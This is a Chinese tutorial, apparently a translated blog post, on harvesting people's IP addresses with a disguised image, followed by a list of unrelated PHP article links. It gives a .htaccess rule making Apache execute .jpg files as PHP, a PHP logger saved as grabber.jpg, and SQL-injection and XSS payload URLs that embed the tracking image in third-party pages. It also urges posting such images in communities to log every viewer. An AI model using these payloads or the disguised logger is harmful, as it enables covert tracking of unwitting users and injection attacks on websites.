基于PHP實(shí)現(xiàn)通過照片獲取ip地址

更新時間：2016年04月26日 09:42:53 投稿：mrr

在本教程中，我們將學(xué)習(xí)如何用一張照片來盜取ip地址。我的想法是通過修改.htaccess文件，將jpg文件當(dāng)作php文件來解析。感興趣的朋友一起學(xué)習(xí)吧

在本教程中，我們將學(xué)習(xí)如何用一張照片來盜取ip地址。我的想法是通過修改.htaccess文件，將jpg文件當(dāng)作php文件來解析。

下面就是我們需要向.htaccess中添加的代碼：

AddHandler application/x-httpd-php5 .jpg

然后將下面的代碼復(fù)制到記事本中，命名為grabber.jpg

<?php
$fh = fopen(‘ip_list.txt', ‘a(chǎn)');
fwrite($fh, $_SERVER[‘REMOTE_ADDR'].”
“);
fclose($fh);
$im = imagecreatefromjpeg(“n00b.png”);
header(‘Content-Type: image/jpeg');
imagejpeg($im);
imagedestroy($im);
?>

將grabber.jpg的權(quán)限設(shè)置為755，然后再找一張照片，將其命名為n00b.png，接著放到與grabber.jpg相同的目錄之中。

就這樣，一切工作就緒了。當(dāng)別人瀏覽grabber.jpg這張照片的時候，他的ip地址就會被記錄下來。

（譯者注：需要把這些東西上傳至我們的個人網(wǎng)站空間中）

POC：

(譯者注：作者這里貼了一張可獲取ip的演示照片，為了大家的隱私，我沒有將其貼出，讀者可自行去作者博客查看)

至此，我們的照片已經(jīng)可以開始工作了。

接著我還想說明一下如何使用SQLi來獲取ip地址。其實(shí)使用照片來盜取ip地址十分快捷，我們沒有理由去使用SQLi這種方法，但是為了讓讀者獲取到更多的知識，我還是說明一下吧：

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1′ union select 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#

現(xiàn)在，再說一下如何使用xss來獲取ip地址：

http://leettime.net/xsslab1/chalg1.php?name=<img src=”http://leettime.net/idiots_test_lab/imageip/tryme.jpg”>&submit=Search

好了，就是這些了。

我們可以用這個技巧做許多有趣的事情，事實(shí)上大部分社區(qū)都允許我們發(fā)布一些照片，所以我們可以用這個方法去獲取所有訪問到我們照片的人的ip地址。

以上所述是小編給大家介紹的基于PHP實(shí)現(xiàn)通過照片獲取ip地址的相關(guān)內(nèi)容，希望對大家有所幫助！

您可能感興趣的文章:

相關(guān)文章

thinkphp數(shù)據(jù)查詢和遍歷數(shù)組實(shí)例
這篇文章主要介紹了thinkphp數(shù)據(jù)查詢和遍歷數(shù)組的方法,包括數(shù)據(jù)庫的DSN方法配置、CURD操作方法以及模板的遍歷數(shù)組等技巧,具有一定的借鑒價值,需要的朋友可以參考下
2014-11-11
php讀取mysql的簡單實(shí)例
讀取數(shù)據(jù)庫我們需要利用php中的函數(shù)連接數(shù)據(jù)庫然后再利用sql查詢表中的數(shù)據(jù)再遍歷出來即可了，下面我們來看一個簡單讀取mysql實(shí)例
2014-01-01
Laravel框架中集成MongoDB和使用詳解
今天小編就為大家分享一篇Laravel框架中集成MongoDB和使用詳解，具有很好的參考價值，希望對大家有所幫助。一起跟隨小編過來看看吧
2019-10-10
Laravel中的Blade模板引擎示例詳解
laravel的模版引擎采用了blade模版引擎，下面這篇文章主要給大家介紹了關(guān)于Laravel中Blade模板引擎的相關(guān)資料，文中通過示例代碼介紹的非常詳細(xì)，對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值，需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧。
2017-10-10
PHP實(shí)現(xiàn)的簡單mock json腳本分享
這篇文章主要介紹了PHP實(shí)現(xiàn)的簡單mock json腳本分享,本文直接給出實(shí)現(xiàn)代碼,需要的朋友可以參考下
2015-02-02
關(guān)于Thinkphp6的日志問題
這篇文章主要介紹了關(guān)于Thinkphp6的日志問題，具有很好的參考價值，希望對大家有所幫助。如有錯誤或未考慮完全的地方，望不吝賜教
2023-03-03
PHP寫UltraEdit插件腳本實(shí)現(xiàn)方法
PHP寫UltraEdit插件腳本實(shí)現(xiàn)方法，需要的朋友可以從參考下。
2011-12-12
PHP無限分類(樹形類)
PHP無限分類，Google一下就能找到很多相關(guān)資料，思路比較拉風(fēng)的，也是用得比較多的就是分類表至少有id,pid,name三個字段，id自增表分類，pid為父分類，name為分類名，這樣就構(gòu)成了一棵樹，如下，算是我查詢分類表得到的結(jié)果集
2013-09-09
利用PHPStorm如何開發(fā)Laravel應(yīng)用詳解
這篇文章主要給大家介紹了關(guān)于利用PHPStorm如何開發(fā)Laravel應(yīng)用的相關(guān)資料，文中通過示例代碼介紹的非常詳細(xì)，對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值，需要的朋友們下面跟著小編來一起學(xué)習(xí)學(xué)習(xí)下吧。
2017-08-08
Php中使用Select 查詢語句的實(shí)例
php中要查詢mysql數(shù)據(jù)庫中的內(nèi)容我們必須先連接mysql數(shù)據(jù)庫，然后再利用sql語句進(jìn)行查詢，下面我們來看一些例子吧
2014-02-02